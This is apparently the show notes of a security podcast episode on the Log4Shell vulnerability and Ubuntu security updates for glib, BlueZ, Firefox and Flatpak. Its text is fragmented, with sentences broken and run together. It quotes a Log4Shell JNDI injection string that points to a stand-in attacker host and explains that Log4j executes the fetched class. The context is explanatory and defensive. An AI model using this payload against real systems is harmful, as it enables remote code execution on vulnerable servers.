Just in time for the holidays, Log4Shell comes along to wreck everyone’s weekend - so we take a deep dive into the vulnerability that has set the internet on fire, plus we cover security updates for BlueZ, Firefox, Flatpak and more.
27 unique CVEs addressed
GLIB_CHARSETALIAS_DIR
env var, could then possibly exploit
setuid binaries like pkexec
which are linked against glib to possibly
read root-owned files - fixed to just have glib not read and use this
environment variable2.15.0
for Ubuntu >= 20.04 LTS and
otherwise removed the offending class in Ubuntu 18.04 etc (USN-5192-1)${jndi:ldap://attacker.com/malware}
Log4j will perform the lookup via LDAP to retrieve the Java class at
that URI and then execute itjava/org/apache/logging/log4j/core/lookup/JndiLookup
)2.16.0
was done - this is now
in Ubuntu >= 20.04 LTS as well (USN-5197-1)